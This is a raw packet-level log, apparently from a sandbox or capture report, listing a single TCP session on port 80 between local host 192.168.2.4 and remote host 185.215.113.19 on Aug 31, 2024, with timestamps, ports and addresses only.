Aug 31, 2024 22:41:57.505835056 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.505856037 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.505886078 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.505906105 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.505919933 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.505939960 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.505960941 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.505980968 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.505997896 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506015062 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506032944 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506055117 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506076097 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506088972 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506110907 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506131887 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506154060 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506174088 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506196022 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506211042 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506234884 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506246090 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506268978 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506289005 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506299973 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506321907 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506341934 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506362915 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506372929 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506395102 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506417036 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506439924 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506457090 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506479025 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506494045 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506510019 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506531954 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506551981 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506572008 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506591082 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506614923 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506624937 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506644964 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506666899 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506690025 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506710052 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506731033 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506752968 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506767035 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506788015 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506808043 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506824017 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506844044 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506865025 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506877899 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506901026 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506916046 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506938934 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506962061 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.506982088 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507003069 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507015944 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507039070 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507059097 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507075071 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507091999 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507112980 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507133961 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507153988 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507165909 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507186890 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507203102 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507224083 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.507224083 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507236004 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.507246017 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.507249117 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507256985 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.507266998 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507267952 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.507288933 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507311106 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507324934 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507348061 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507364988 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507381916 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507400036 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507416010 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507440090 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507448912 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507472992 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507493973 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507514954 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507534981 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507558107 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507576942 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507592916 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507615089 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507633924 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507647991 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507672071 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507687092 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507708073 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507721901 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507744074 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507756948 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507781029 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507802963 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507822990 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507842064 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507863045 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507878065 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507899046 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507920027 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507932901 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507952929 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507972956 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.507992983 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508002996 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508024931 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508048058 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508063078 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508088112 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508110046 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508132935 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508146048 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508158922 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508183002 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508203030 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508222103 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508239985 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508258104 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508276939 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508292913 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508313894 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508331060 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508353949 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508375883 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508393049 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508414030 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508433104 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508445024 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508467913 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508502007 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508502007 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508526087 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508539915 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508562088 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508582115 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508600950 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508622885 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508642912 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508654118 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508681059 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508696079 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508719921 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508735895 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508750916 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508769989 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508788109 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.508793116 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508810997 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508829117 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508851051 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508872032 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508891106 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508908987 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508928061 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508949041 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508965969 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.508987904 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.509001970 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.509022951 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.509041071 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.509057045 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.509078979 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.509094954 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.509115934 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.509135962 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.509156942 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.509176970 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.509193897 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.509210110 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.509236097 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.509257078 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.509275913 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.509294987 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.509314060 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.509334087 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.509350061 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.509371996 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.509980917 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.509993076 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.510004044 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.510015011 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.510025024 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.510035992 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.510046959 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.510057926 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.510068893 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.510078907 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.510090113 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.510099888 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.510109901 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.510121107 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.510130882 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.510142088 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.510153055 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.510164022 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.510175943 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.510185957 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.510195971 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.510206938 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.510217905 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.510227919 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.510241032 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.510251999 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.510262966 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.513508081 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.513520002 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.513530970 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.513541937 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.513551950 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.513562918 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.513572931 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.513583899 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.513595104 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.513606071 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.513616085 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.513627052 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.513637066 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.513648033 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.513659000 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.513669014 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.513679981 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.513689995 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.513700962 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.513710976 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.513721943 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.513731956 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.513742924 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.513753891 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.513765097 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.513778925 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.513791084 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.513801098 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.513812065 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.513822079 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.513839006 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.513849974 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.513859987 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.513870001 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.513880968 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.513891935 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.513901949 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.513911963 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.513921976 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.513932943 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.513942957 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.513953924 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.513964891 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.514766932 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.514780998 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.514791965 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.514802933 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.514812946 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.514823914 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.514833927 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.514844894 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.514854908 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.514864922 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.514875889 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.514887094 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.514898062 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.514909029 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.514919043 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.514930010 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.514940023 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.514950991 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.514961004 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.514971972 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.514981985 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.514992952 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.515002966 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.515013933 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.515024900 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.515042067 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.515054941 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.515065908 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.515077114 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.515086889 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.515098095 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.515108109 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.515119076 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.515129089 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.515140057 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.515150070 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.515161037 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.515172005 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.515182018 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.515192032 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.515202999 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.515213013 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.515223980 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.518285036 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.518300056 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.518311977 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.518321991 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.518332958 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.518343925 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.518353939 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.518364906 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.518376112 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.518387079 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.518397093 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.518407106 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.518416882 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.518428087 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.518440008 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.518450975 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.518461943 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.518471956 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.518481970 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.518491983 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.518502951 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.518513918 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.518524885 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.518536091 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.518546104 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.518558025 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.518570900 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.518582106 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.518593073 CEST	80	49732	185.215.113.19	192.168.2.4
